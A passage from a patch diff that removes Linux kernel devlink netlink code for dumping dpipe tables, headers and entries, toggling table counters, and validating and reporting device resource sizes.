+-	struct devlink_dpipe_field *field = &header->fields[action->field_id];
+-	struct nlattr *action_attr;
+-
+-	action_attr = nla_nest_start_noflag(skb, DEVLINK_ATTR_DPIPE_ACTION);
+-	if (!action_attr)
+-		return -EMSGSIZE;
+-
+-	if (nla_put_u32(skb, DEVLINK_ATTR_DPIPE_ACTION_TYPE, action->type) ||
+-	    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_HEADER_INDEX, action->header_index) ||
+-	    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_HEADER_ID, header->id) ||
+-	    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_FIELD_ID, field->id) ||
+-	    nla_put_u8(skb, DEVLINK_ATTR_DPIPE_HEADER_GLOBAL, header->global))
+-		goto nla_put_failure;
+-
+-	nla_nest_end(skb, action_attr);
+-	return 0;
+-
+-nla_put_failure:
+-	nla_nest_cancel(skb, action_attr);
+-	return -EMSGSIZE;
+-}
+-EXPORT_SYMBOL_GPL(devlink_dpipe_action_put);
+-
+-static int devlink_dpipe_actions_put(struct devlink_dpipe_table *table,
+-				     struct sk_buff *skb)
+-{
+-	struct nlattr *actions_attr;
+-
+-	actions_attr = nla_nest_start_noflag(skb,
+-					     DEVLINK_ATTR_DPIPE_TABLE_ACTIONS);
+-	if (!actions_attr)
+-		return -EMSGSIZE;
+-
+-	if (table->table_ops->actions_dump(table->priv, skb))
+-		goto nla_put_failure;
+-
+-	nla_nest_end(skb, actions_attr);
+-	return 0;
+-
+-nla_put_failure:
+-	nla_nest_cancel(skb, actions_attr);
+-	return -EMSGSIZE;
+-}
+-
+-static int devlink_dpipe_table_put(struct sk_buff *skb,
+-				   struct devlink_dpipe_table *table)
+-{
+-	struct nlattr *table_attr;
+-	u64 table_size;
+-
+-	table_size = table->table_ops->size_get(table->priv);
+-	table_attr = nla_nest_start_noflag(skb, DEVLINK_ATTR_DPIPE_TABLE);
+-	if (!table_attr)
+-		return -EMSGSIZE;
+-
+-	if (nla_put_string(skb, DEVLINK_ATTR_DPIPE_TABLE_NAME, table->name) ||
+-	    nla_put_u64_64bit(skb, DEVLINK_ATTR_DPIPE_TABLE_SIZE, table_size,
+-			      DEVLINK_ATTR_PAD))
+-		goto nla_put_failure;
+-	if (nla_put_u8(skb, DEVLINK_ATTR_DPIPE_TABLE_COUNTERS_ENABLED,
+-		       table->counters_enabled))
+-		goto nla_put_failure;
+-
+-	if (table->resource_valid) {
+-		if (nla_put_u64_64bit(skb, DEVLINK_ATTR_DPIPE_TABLE_RESOURCE_ID,
+-				      table->resource_id, DEVLINK_ATTR_PAD) ||
+-		    nla_put_u64_64bit(skb, DEVLINK_ATTR_DPIPE_TABLE_RESOURCE_UNITS,
+-				      table->resource_units, DEVLINK_ATTR_PAD))
+-			goto nla_put_failure;
+-	}
+-	if (devlink_dpipe_matches_put(table, skb))
+-		goto nla_put_failure;
+-
+-	if (devlink_dpipe_actions_put(table, skb))
+-		goto nla_put_failure;
+-
+-	nla_nest_end(skb, table_attr);
+-	return 0;
+-
+-nla_put_failure:
+-	nla_nest_cancel(skb, table_attr);
+-	return -EMSGSIZE;
+-}
+-
+-static int devlink_dpipe_send_and_alloc_skb(struct sk_buff **pskb,
+-					    struct genl_info *info)
+-{
+-	int err;
+-
+-	if (*pskb) {
+-		err = genlmsg_reply(*pskb, info);
+-		if (err)
+-			return err;
+-	}
+-	*pskb = genlmsg_new(GENLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!*pskb)
+-		return -ENOMEM;
+-	return 0;
+-}
+-
+-static int devlink_dpipe_tables_fill(struct genl_info *info,
+-				     enum devlink_command cmd, int flags,
+-				     struct list_head *dpipe_tables,
+-				     const char *table_name)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_dpipe_table *table;
+-	struct nlattr *tables_attr;
+-	struct sk_buff *skb = NULL;
+-	struct nlmsghdr *nlh;
+-	bool incomplete;
+-	void *hdr;
+-	int i;
+-	int err;
+-
+-	table = list_first_entry(dpipe_tables,
+-				 struct devlink_dpipe_table, list);
+-start_again:
+-	err = devlink_dpipe_send_and_alloc_skb(&skb, info);
+-	if (err)
+-		return err;
+-
+-	hdr = genlmsg_put(skb, info->snd_portid, info->snd_seq,
+-			  &devlink_nl_family, NLM_F_MULTI, cmd);
+-	if (!hdr) {
+-		nlmsg_free(skb);
+-		return -EMSGSIZE;
+-	}
+-
+-	if (devlink_nl_put_handle(skb, devlink))
+-		goto nla_put_failure;
+-	tables_attr = nla_nest_start_noflag(skb, DEVLINK_ATTR_DPIPE_TABLES);
+-	if (!tables_attr)
+-		goto nla_put_failure;
+-
+-	i = 0;
+-	incomplete = false;
+-	list_for_each_entry_from(table, dpipe_tables, list) {
+-		if (!table_name) {
+-			err = devlink_dpipe_table_put(skb, table);
+-			if (err) {
+-				if (!i)
+-					goto err_table_put;
+-				incomplete = true;
+-				break;
+-			}
+-		} else {
+-			if (!strcmp(table->name, table_name)) {
+-				err = devlink_dpipe_table_put(skb, table);
+-				if (err)
+-					break;
+-			}
+-		}
+-		i++;
+-	}
+-
+-	nla_nest_end(skb, tables_attr);
+-	genlmsg_end(skb, hdr);
+-	if (incomplete)
+-		goto start_again;
+-
+-send_done:
+-	nlh = nlmsg_put(skb, info->snd_portid, info->snd_seq,
+-			NLMSG_DONE, 0, flags | NLM_F_MULTI);
+-	if (!nlh) {
+-		err = devlink_dpipe_send_and_alloc_skb(&skb, info);
+-		if (err)
+-			return err;
+-		goto send_done;
+-	}
+-
+-	return genlmsg_reply(skb, info);
+-
+-nla_put_failure:
+-	err = -EMSGSIZE;
+-err_table_put:
+-	nlmsg_free(skb);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_dpipe_table_get(struct sk_buff *skb,
+-					  struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	const char *table_name =  NULL;
+-
+-	if (info->attrs[DEVLINK_ATTR_DPIPE_TABLE_NAME])
+-		table_name = nla_data(info->attrs[DEVLINK_ATTR_DPIPE_TABLE_NAME]);
+-
+-	return devlink_dpipe_tables_fill(info, DEVLINK_CMD_DPIPE_TABLE_GET, 0,
+-					 &devlink->dpipe_table_list,
+-					 table_name);
+-}
+-
+-static int devlink_dpipe_value_put(struct sk_buff *skb,
+-				   struct devlink_dpipe_value *value)
+-{
+-	if (nla_put(skb, DEVLINK_ATTR_DPIPE_VALUE,
+-		    value->value_size, value->value))
+-		return -EMSGSIZE;
+-	if (value->mask)
+-		if (nla_put(skb, DEVLINK_ATTR_DPIPE_VALUE_MASK,
+-			    value->value_size, value->mask))
+-			return -EMSGSIZE;
+-	if (value->mapping_valid)
+-		if (nla_put_u32(skb, DEVLINK_ATTR_DPIPE_VALUE_MAPPING,
+-				value->mapping_value))
+-			return -EMSGSIZE;
+-	return 0;
+-}
+-
+-static int devlink_dpipe_action_value_put(struct sk_buff *skb,
+-					  struct devlink_dpipe_value *value)
+-{
+-	if (!value->action)
+-		return -EINVAL;
+-	if (devlink_dpipe_action_put(skb, value->action))
+-		return -EMSGSIZE;
+-	if (devlink_dpipe_value_put(skb, value))
+-		return -EMSGSIZE;
+-	return 0;
+-}
+-
+-static int devlink_dpipe_action_values_put(struct sk_buff *skb,
+-					   struct devlink_dpipe_value *values,
+-					   unsigned int values_count)
+-{
+-	struct nlattr *action_attr;
+-	int i;
+-	int err;
+-
+-	for (i = 0; i < values_count; i++) {
+-		action_attr = nla_nest_start_noflag(skb,
+-						    DEVLINK_ATTR_DPIPE_ACTION_VALUE);
+-		if (!action_attr)
+-			return -EMSGSIZE;
+-		err = devlink_dpipe_action_value_put(skb, &values[i]);
+-		if (err)
+-			goto err_action_value_put;
+-		nla_nest_end(skb, action_attr);
+-	}
+-	return 0;
+-
+-err_action_value_put:
+-	nla_nest_cancel(skb, action_attr);
+-	return err;
+-}
+-
+-static int devlink_dpipe_match_value_put(struct sk_buff *skb,
+-					 struct devlink_dpipe_value *value)
+-{
+-	if (!value->match)
+-		return -EINVAL;
+-	if (devlink_dpipe_match_put(skb, value->match))
+-		return -EMSGSIZE;
+-	if (devlink_dpipe_value_put(skb, value))
+-		return -EMSGSIZE;
+-	return 0;
+-}
+-
+-static int devlink_dpipe_match_values_put(struct sk_buff *skb,
+-					  struct devlink_dpipe_value *values,
+-					  unsigned int values_count)
+-{
+-	struct nlattr *match_attr;
+-	int i;
+-	int err;
+-
+-	for (i = 0; i < values_count; i++) {
+-		match_attr = nla_nest_start_noflag(skb,
+-						   DEVLINK_ATTR_DPIPE_MATCH_VALUE);
+-		if (!match_attr)
+-			return -EMSGSIZE;
+-		err = devlink_dpipe_match_value_put(skb, &values[i]);
+-		if (err)
+-			goto err_match_value_put;
+-		nla_nest_end(skb, match_attr);
+-	}
+-	return 0;
+-
+-err_match_value_put:
+-	nla_nest_cancel(skb, match_attr);
+-	return err;
+-}
+-
+-static int devlink_dpipe_entry_put(struct sk_buff *skb,
+-				   struct devlink_dpipe_entry *entry)
+-{
+-	struct nlattr *entry_attr, *matches_attr, *actions_attr;
+-	int err;
+-
+-	entry_attr = nla_nest_start_noflag(skb, DEVLINK_ATTR_DPIPE_ENTRY);
+-	if (!entry_attr)
+-		return  -EMSGSIZE;
+-
+-	if (nla_put_u64_64bit(skb, DEVLINK_ATTR_DPIPE_ENTRY_INDEX, entry->index,
+-			      DEVLINK_ATTR_PAD))
+-		goto nla_put_failure;
+-	if (entry->counter_valid)
+-		if (nla_put_u64_64bit(skb, DEVLINK_ATTR_DPIPE_ENTRY_COUNTER,
+-				      entry->counter, DEVLINK_ATTR_PAD))
+-			goto nla_put_failure;
+-
+-	matches_attr = nla_nest_start_noflag(skb,
+-					     DEVLINK_ATTR_DPIPE_ENTRY_MATCH_VALUES);
+-	if (!matches_attr)
+-		goto nla_put_failure;
+-
+-	err = devlink_dpipe_match_values_put(skb, entry->match_values,
+-					     entry->match_values_count);
+-	if (err) {
+-		nla_nest_cancel(skb, matches_attr);
+-		goto err_match_values_put;
+-	}
+-	nla_nest_end(skb, matches_attr);
+-
+-	actions_attr = nla_nest_start_noflag(skb,
+-					     DEVLINK_ATTR_DPIPE_ENTRY_ACTION_VALUES);
+-	if (!actions_attr)
+-		goto nla_put_failure;
+-
+-	err = devlink_dpipe_action_values_put(skb, entry->action_values,
+-					      entry->action_values_count);
+-	if (err) {
+-		nla_nest_cancel(skb, actions_attr);
+-		goto err_action_values_put;
+-	}
+-	nla_nest_end(skb, actions_attr);
+-
+-	nla_nest_end(skb, entry_attr);
+-	return 0;
+-
+-nla_put_failure:
+-	err = -EMSGSIZE;
+-err_match_values_put:
+-err_action_values_put:
+-	nla_nest_cancel(skb, entry_attr);
+-	return err;
+-}
+-
+-static struct devlink_dpipe_table *
+-devlink_dpipe_table_find(struct list_head *dpipe_tables,
+-			 const char *table_name, struct devlink *devlink)
+-{
+-	struct devlink_dpipe_table *table;
+-	list_for_each_entry_rcu(table, dpipe_tables, list,
+-				lockdep_is_held(&devlink->lock)) {
+-		if (!strcmp(table->name, table_name))
+-			return table;
+-	}
+-	return NULL;
+-}
+-
+-int devlink_dpipe_entry_ctx_prepare(struct devlink_dpipe_dump_ctx *dump_ctx)
+-{
+-	struct devlink *devlink;
+-	int err;
+-
+-	err = devlink_dpipe_send_and_alloc_skb(&dump_ctx->skb,
+-					       dump_ctx->info);
+-	if (err)
+-		return err;
+-
+-	dump_ctx->hdr = genlmsg_put(dump_ctx->skb,
+-				    dump_ctx->info->snd_portid,
+-				    dump_ctx->info->snd_seq,
+-				    &devlink_nl_family, NLM_F_MULTI,
+-				    dump_ctx->cmd);
+-	if (!dump_ctx->hdr)
+-		goto nla_put_failure;
+-
+-	devlink = dump_ctx->info->user_ptr[0];
+-	if (devlink_nl_put_handle(dump_ctx->skb, devlink))
+-		goto nla_put_failure;
+-	dump_ctx->nest = nla_nest_start_noflag(dump_ctx->skb,
+-					       DEVLINK_ATTR_DPIPE_ENTRIES);
+-	if (!dump_ctx->nest)
+-		goto nla_put_failure;
+-	return 0;
+-
+-nla_put_failure:
+-	nlmsg_free(dump_ctx->skb);
+-	return -EMSGSIZE;
+-}
+-EXPORT_SYMBOL_GPL(devlink_dpipe_entry_ctx_prepare);
+-
+-int devlink_dpipe_entry_ctx_append(struct devlink_dpipe_dump_ctx *dump_ctx,
+-				   struct devlink_dpipe_entry *entry)
+-{
+-	return devlink_dpipe_entry_put(dump_ctx->skb, entry);
+-}
+-EXPORT_SYMBOL_GPL(devlink_dpipe_entry_ctx_append);
+-
+-int devlink_dpipe_entry_ctx_close(struct devlink_dpipe_dump_ctx *dump_ctx)
+-{
+-	nla_nest_end(dump_ctx->skb, dump_ctx->nest);
+-	genlmsg_end(dump_ctx->skb, dump_ctx->hdr);
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devlink_dpipe_entry_ctx_close);
+-
+-void devlink_dpipe_entry_clear(struct devlink_dpipe_entry *entry)
+-
+-{
+-	unsigned int value_count, value_index;
+-	struct devlink_dpipe_value *value;
+-
+-	value = entry->action_values;
+-	value_count = entry->action_values_count;
+-	for (value_index = 0; value_index < value_count; value_index++) {
+-		kfree(value[value_index].value);
+-		kfree(value[value_index].mask);
+-	}
+-
+-	value = entry->match_values;
+-	value_count = entry->match_values_count;
+-	for (value_index = 0; value_index < value_count; value_index++) {
+-		kfree(value[value_index].value);
+-		kfree(value[value_index].mask);
+-	}
+-}
+-EXPORT_SYMBOL_GPL(devlink_dpipe_entry_clear);
+-
+-static int devlink_dpipe_entries_fill(struct genl_info *info,
+-				      enum devlink_command cmd, int flags,
+-				      struct devlink_dpipe_table *table)
+-{
+-	struct devlink_dpipe_dump_ctx dump_ctx;
+-	struct nlmsghdr *nlh;
+-	int err;
+-
+-	dump_ctx.skb = NULL;
+-	dump_ctx.cmd = cmd;
+-	dump_ctx.info = info;
+-
+-	err = table->table_ops->entries_dump(table->priv,
+-					     table->counters_enabled,
+-					     &dump_ctx);
+-	if (err)
+-		return err;
+-
+-send_done:
+-	nlh = nlmsg_put(dump_ctx.skb, info->snd_portid, info->snd_seq,
+-			NLMSG_DONE, 0, flags | NLM_F_MULTI);
+-	if (!nlh) {
+-		err = devlink_dpipe_send_and_alloc_skb(&dump_ctx.skb, info);
+-		if (err)
+-			return err;
+-		goto send_done;
+-	}
+-	return genlmsg_reply(dump_ctx.skb, info);
+-}
+-
+-static int devlink_nl_cmd_dpipe_entries_get(struct sk_buff *skb,
+-					    struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_dpipe_table *table;
+-	const char *table_name;
+-
+-	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_DPIPE_TABLE_NAME))
+-		return -EINVAL;
+-
+-	table_name = nla_data(info->attrs[DEVLINK_ATTR_DPIPE_TABLE_NAME]);
+-	table = devlink_dpipe_table_find(&devlink->dpipe_table_list,
+-					 table_name, devlink);
+-	if (!table)
+-		return -EINVAL;
+-
+-	if (!table->table_ops->entries_dump)
+-		return -EINVAL;
+-
+-	return devlink_dpipe_entries_fill(info, DEVLINK_CMD_DPIPE_ENTRIES_GET,
+-					  0, table);
+-}
+-
+-static int devlink_dpipe_fields_put(struct sk_buff *skb,
+-				    const struct devlink_dpipe_header *header)
+-{
+-	struct devlink_dpipe_field *field;
+-	struct nlattr *field_attr;
+-	int i;
+-
+-	for (i = 0; i < header->fields_count; i++) {
+-		field = &header->fields[i];
+-		field_attr = nla_nest_start_noflag(skb,
+-						   DEVLINK_ATTR_DPIPE_FIELD);
+-		if (!field_attr)
+-			return -EMSGSIZE;
+-		if (nla_put_string(skb, DEVLINK_ATTR_DPIPE_FIELD_NAME, field->name) ||
+-		    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_FIELD_ID, field->id) ||
+-		    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_FIELD_BITWIDTH, field->bitwidth) ||
+-		    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_FIELD_MAPPING_TYPE, field->mapping_type))
+-			goto nla_put_failure;
+-		nla_nest_end(skb, field_attr);
+-	}
+-	return 0;
+-
+-nla_put_failure:
+-	nla_nest_cancel(skb, field_attr);
+-	return -EMSGSIZE;
+-}
+-
+-static int devlink_dpipe_header_put(struct sk_buff *skb,
+-				    struct devlink_dpipe_header *header)
+-{
+-	struct nlattr *fields_attr, *header_attr;
+-	int err;
+-
+-	header_attr = nla_nest_start_noflag(skb, DEVLINK_ATTR_DPIPE_HEADER);
+-	if (!header_attr)
+-		return -EMSGSIZE;
+-
+-	if (nla_put_string(skb, DEVLINK_ATTR_DPIPE_HEADER_NAME, header->name) ||
+-	    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_HEADER_ID, header->id) ||
+-	    nla_put_u8(skb, DEVLINK_ATTR_DPIPE_HEADER_GLOBAL, header->global))
+-		goto nla_put_failure;
+-
+-	fields_attr = nla_nest_start_noflag(skb,
+-					    DEVLINK_ATTR_DPIPE_HEADER_FIELDS);
+-	if (!fields_attr)
+-		goto nla_put_failure;
+-
+-	err = devlink_dpipe_fields_put(skb, header);
+-	if (err) {
+-		nla_nest_cancel(skb, fields_attr);
+-		goto nla_put_failure;
+-	}
+-	nla_nest_end(skb, fields_attr);
+-	nla_nest_end(skb, header_attr);
+-	return 0;
+-
+-nla_put_failure:
+-	err = -EMSGSIZE;
+-	nla_nest_cancel(skb, header_attr);
+-	return err;
+-}
+-
+-static int devlink_dpipe_headers_fill(struct genl_info *info,
+-				      enum devlink_command cmd, int flags,
+-				      struct devlink_dpipe_headers *
+-				      dpipe_headers)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct nlattr *headers_attr;
+-	struct sk_buff *skb = NULL;
+-	struct nlmsghdr *nlh;
+-	void *hdr;
+-	int i, j;
+-	int err;
+-
+-	i = 0;
+-start_again:
+-	err = devlink_dpipe_send_and_alloc_skb(&skb, info);
+-	if (err)
+-		return err;
+-
+-	hdr = genlmsg_put(skb, info->snd_portid, info->snd_seq,
+-			  &devlink_nl_family, NLM_F_MULTI, cmd);
+-	if (!hdr) {
+-		nlmsg_free(skb);
+-		return -EMSGSIZE;
+-	}
+-
+-	if (devlink_nl_put_handle(skb, devlink))
+-		goto nla_put_failure;
+-	headers_attr = nla_nest_start_noflag(skb, DEVLINK_ATTR_DPIPE_HEADERS);
+-	if (!headers_attr)
+-		goto nla_put_failure;
+-
+-	j = 0;
+-	for (; i < dpipe_headers->headers_count; i++) {
+-		err = devlink_dpipe_header_put(skb, dpipe_headers->headers[i]);
+-		if (err) {
+-			if (!j)
+-				goto err_table_put;
+-			break;
+-		}
+-		j++;
+-	}
+-	nla_nest_end(skb, headers_attr);
+-	genlmsg_end(skb, hdr);
+-	if (i != dpipe_headers->headers_count)
+-		goto start_again;
+-
+-send_done:
+-	nlh = nlmsg_put(skb, info->snd_portid, info->snd_seq,
+-			NLMSG_DONE, 0, flags | NLM_F_MULTI);
+-	if (!nlh) {
+-		err = devlink_dpipe_send_and_alloc_skb(&skb, info);
+-		if (err)
+-			return err;
+-		goto send_done;
+-	}
+-	return genlmsg_reply(skb, info);
+-
+-nla_put_failure:
+-	err = -EMSGSIZE;
+-err_table_put:
+-	nlmsg_free(skb);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_dpipe_headers_get(struct sk_buff *skb,
+-					    struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-
+-	if (!devlink->dpipe_headers)
+-		return -EOPNOTSUPP;
+-	return devlink_dpipe_headers_fill(info, DEVLINK_CMD_DPIPE_HEADERS_GET,
+-					  0, devlink->dpipe_headers);
+-}
+-
+-static int devlink_dpipe_table_counters_set(struct devlink *devlink,
+-					    const char *table_name,
+-					    bool enable)
+-{
+-	struct devlink_dpipe_table *table;
+-
+-	table = devlink_dpipe_table_find(&devlink->dpipe_table_list,
+-					 table_name, devlink);
+-	if (!table)
+-		return -EINVAL;
+-
+-	if (table->counter_control_extern)
+-		return -EOPNOTSUPP;
+-
+-	if (!(table->counters_enabled ^ enable))
+-		return 0;
+-
+-	table->counters_enabled = enable;
+-	if (table->table_ops->counters_set_update)
+-		table->table_ops->counters_set_update(table->priv, enable);
+-	return 0;
+-}
+-
+-static int devlink_nl_cmd_dpipe_table_counters_set(struct sk_buff *skb,
+-						   struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	const char *table_name;
+-	bool counters_enable;
+-
+-	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_DPIPE_TABLE_NAME) ||
+-	    GENL_REQ_ATTR_CHECK(info,
+-				DEVLINK_ATTR_DPIPE_TABLE_COUNTERS_ENABLED))
+-		return -EINVAL;
+-
+-	table_name = nla_data(info->attrs[DEVLINK_ATTR_DPIPE_TABLE_NAME]);
+-	counters_enable = !!nla_get_u8(info->attrs[DEVLINK_ATTR_DPIPE_TABLE_COUNTERS_ENABLED]);
+-
+-	return devlink_dpipe_table_counters_set(devlink, table_name,
+-						counters_enable);
+-}
+-
+-static struct devlink_resource *
+-devlink_resource_find(struct devlink *devlink,
+-		      struct devlink_resource *resource, u64 resource_id)
+-{
+-	struct list_head *resource_list;
+-
+-	if (resource)
+-		resource_list = &resource->resource_list;
+-	else
+-		resource_list = &devlink->resource_list;
+-
+-	list_for_each_entry(resource, resource_list, list) {
+-		struct devlink_resource *child_resource;
+-
+-		if (resource->id == resource_id)
+-			return resource;
+-
+-		child_resource = devlink_resource_find(devlink, resource,
+-						       resource_id);
+-		if (child_resource)
+-			return child_resource;
+-	}
+-	return NULL;
+-}
+-
+-static void
+-devlink_resource_validate_children(struct devlink_resource *resource)
+-{
+-	struct devlink_resource *child_resource;
+-	bool size_valid = true;
+-	u64 parts_size = 0;
+-
+-	if (list_empty(&resource->resource_list))
+-		goto out;
+-
+-	list_for_each_entry(child_resource, &resource->resource_list, list)
+-		parts_size += child_resource->size_new;
+-
+-	if (parts_size > resource->size_new)
+-		size_valid = false;
+-out:
+-	resource->size_valid = size_valid;
+-}
+-
+-static int
+-devlink_resource_validate_size(struct devlink_resource *resource, u64 size,
+-			       struct netlink_ext_ack *extack)
+-{
+-	u64 reminder;
+-	int err = 0;
+-
+-	if (size > resource->size_params.size_max) {
+-		NL_SET_ERR_MSG_MOD(extack, "Size larger than maximum");
+-		err = -EINVAL;
+-	}
+-
+-	if (size < resource->size_params.size_min) {
+-		NL_SET_ERR_MSG_MOD(extack, "Size smaller than minimum");
+-		err = -EINVAL;
+-	}
+-
+-	div64_u64_rem(size, resource->size_params.size_granularity, &reminder);
+-	if (reminder) {
+-		NL_SET_ERR_MSG_MOD(extack, "Wrong granularity");
+-		err = -EINVAL;
+-	}
+-
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_resource_set(struct sk_buff *skb,
+-				       struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_resource *resource;
+-	u64 resource_id;
+-	u64 size;
+-	int err;
+-
+-	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_RESOURCE_ID) ||
+-	    GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_RESOURCE_SIZE))
+-		return -EINVAL;
+-	resource_id = nla_get_u64(info->attrs[DEVLINK_ATTR_RESOURCE_ID]);
+-
+-	resource = devlink_resource_find(devlink, NULL, resource_id);
+-	if (!resource)
+-		return -EINVAL;
+-
+-	size = nla_get_u64(info->attrs[DEVLINK_ATTR_RESOURCE_SIZE]);
+-	err = devlink_resource_validate_size(resource, size, info->extack);
+-	if (err)
+-		return err;
+-
+-	resource->size_new = size;
+-	devlink_resource_validate_children(resource);
+-	if (resource->parent)
+-		devlink_resource_validate_children(resource->parent);
+-	return 0;
+-}
+-
+-static int
+-devlink_resource_size_params_put(struct devlink_resource *resource,
+-				 struct sk_buff *skb)
+-{
+-	struct devlink_resource_size_params *size_params;
+-
+-	size_params = &resource->size_params;
+-	if (nla_put_u64_64bit(skb, DEVLINK_ATTR_RESOURCE_SIZE_GRAN,
+-			      size_params->size_granularity, DEVLINK_ATTR_PAD) ||
+-	    nla_put_u64_64bit(skb, DEVLINK_ATTR_RESOURCE_SIZE_MAX,
+-			      size_params->size_max, DEVLINK_ATTR_PAD) ||
+-	    nla_put_u64_64bit(skb, DEVLINK_ATTR_RESOURCE_SIZE_MIN,
+-			      size_params->size_min, DEVLINK_ATTR_PAD) ||
+-	    nla_put_u8(skb, DEVLINK_ATTR_RESOURCE_UNIT, size_params->unit))
+-		return -EMSGSIZE;
+-	return 0;
+-}
+-
+-static int devlink_resource_occ_put(struct devlink_resource *resource,
+-				    struct sk_buff *skb)
+-{
+-	if (!resource->occ_get)
+-		return 0;
+-	return nla_put_u64_64bit(skb, DEVLINK_ATTR_RESOURCE_OCC,
+-				 resource->occ_get(resource->occ_get_priv),
+-				 DEVLINK_ATTR_PAD);
+-}
+-
+-static int devlink_resource_put(struct devlink *devlink, struct sk_buff *skb,
+-				struct devlink_resource *resource)
+-{
+-	struct devlink_resource *child_resource;
+-	struct nlattr *child_resource_attr;
+-	struct nlattr *resource_attr;
+-
+-	resource_attr = nla_nest_start_noflag(skb, DEVLINK_ATTR_RESOURCE);
+-	if (!resource_attr)
+-		return -EMSGSIZE;
+-
+-	if (nla_put_string(skb, DEVLINK_ATTR_RESOURCE_NAME, resource->name) ||
+-	    nla_put_u64_64bit(skb, DEVLINK_ATTR_RESOURCE_SIZE, resource->size,
+-			      DEVLINK_ATTR_PAD) ||
+-	    nla_put_u64_64bit(skb, DEVLINK_ATTR_RESOURCE_ID, resource->id,
+-			      DEVLINK_ATTR_PAD))
+-		goto nla_put_failure;
+-	if (resource->size != resource->size_new)
+-		nla_put_u64_64bit(skb, DEVLINK_ATTR_RESOURCE_SIZE_NEW,
+-				  resource->size_new, DEVLINK_ATTR_PAD);
+-	if (devlink_resource_occ_put(resource, skb))
+-		goto nla_put_failure;
+-	if (devlink_resource_size_params_put(resource, skb))
+-		goto nla_put_failure;
+-	if (list_empty(&resource->resource_list))
+-		goto out;
+-
+-	if (nla_put_u8(skb, DEVLINK_ATTR_RESOURCE_SIZE_VALID,
+-		       resource->size_valid))
+-		goto nla_put_failure;
+-
+-	child_resource_attr = nla_nest_start_noflag(skb,
+-						    DEVLINK_ATTR_RESOURCE_LIST);
+-	if (!child_resource_attr)
+-		goto nla_put_failure;
+-
+-	list_for_each_entry(child_resource, &resource->resource_list, list) {
+-		if (devlink_resource_put(devlink, skb, child_resource))
+-			goto resource_put_failure;
+-	}
+-
+-	nla_nest_end(skb, child_resource_attr);
+-out:
+-	nla_nest_end(skb, resource_attr);
+-	return 0;
+-
+-resource_put_failure:
+-	nla_nest_cancel(skb, child_resource_attr);
+-nla_put_failure:
+-	nla_nest_cancel(skb, resource_attr);
+-	return -EMSGSIZE;
+-}
+-
+-static int devlink_resource_fill(struct genl_info *info,
+-				 enum devlink_command cmd, int flags)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_resource *resource;
+-	struct nlattr *resources_attr;
+-	struct sk_buff *skb = NULL;
+-	struct nlmsghdr *nlh;
+-	bool incomplete;
+-	void *hdr;
+-	int i;
+-	int err;
+-
+-	resource = list_first_entry(&devlink->resource_list,
+-				    struct devlink_resource, list);
+-start_again:
+-	err = devlink_dpipe_send_and_alloc_skb(&skb, info);
+-	if (err)
+-		return err;
+-
+-	hdr = genlmsg_put(skb, info->snd_portid, info->snd_seq,
+-			  &devlink_nl_family, NLM_F_MULTI, cmd);
+-	if (!hdr) {
+-		nlmsg_free(skb);
+-		return -EMSGSIZE;
+-	}
+-
+-	if (devlink_nl_put_handle(skb, devlink))
+-		goto nla_put_failure;
+-
+-	resources_attr = nla_nest_start_noflag(skb,
+-					       DEVLINK_ATTR_RESOURCE_LIST);
+-	if (!resources_attr)
+-		goto nla_put_failure;
+-
+-	incomplete = false;
+-	i = 0;
+-	list_for_each_entry_from(resource, &devlink->resource_list, list) {
+-		err = devlink_resource_put(devlink, skb, resource);
+-		if (err) {
+-			if (!i)
+-				goto err_resource_put;
+-			incomplete = true;
+-			break;
+-		}
+-		i++;
+-	}
+-	nla_nest_end(skb, resources_attr);
+-	genlmsg_end(skb, hdr);
+-	if (incomplete)
+-		goto start_again;
+-send_done:
+-	nlh = nlmsg_put(skb, info->snd_portid, info->snd_seq,
+-			NLMSG_DONE, 0, flags | NLM_F_MULTI);
+-	if (!nlh) {
+-		err = devlink_dpipe_send_and_alloc_skb(&skb, info);
+-		if (err)
+-			return err;
+-		goto send_done;
+-	}
+-	return genlmsg_reply(skb, info);
+-
+-nla_put_failure:
+-	err = -EMSGSIZE;
+-err_resource_put:
+-	nlmsg_free(skb);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_resource_dump(struct sk_buff *skb,
+-					struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-
+-	if (list_empty(&devlink->resource_list))
+-		return -EOPNOTSUPP;
+-
+-	return devlink_resource_fill(info, DEVLINK_CMD_RESOURCE_DUMP, 0);
+-}
+-
+-static int
+-devlink_resources_validate(struct devlink *devlink,
+-			   struct devlink_resource *resource,
+-			   struct genl_info *info)
+-{
+-	struct list_head *resource_list;
+-	int err = 0;
+-
+-	if (resource)
+-		resource_list = &resource->resource_list;
+-	else
+-		resource_list = &devlink->resource_list;
+-
+-	list_for_each_entry(resource, resource_list, list) {
+-		if (!resource->size_valid)
+-			return -EINVAL;
+-		err = devlink_resources_validate(devlink, resource, info);
+-		if (err)
+-			return err;
+-	}
+-	return err;
+-}
+-
+-static struct net *devlink_netns_get(struct sk_buff *skb,
+-				     struct genl_info *info)
+-{
+-	struct nlattr *netns_pid_attr = info->attrs[DEVLINK_ATTR_NETNS_PID];
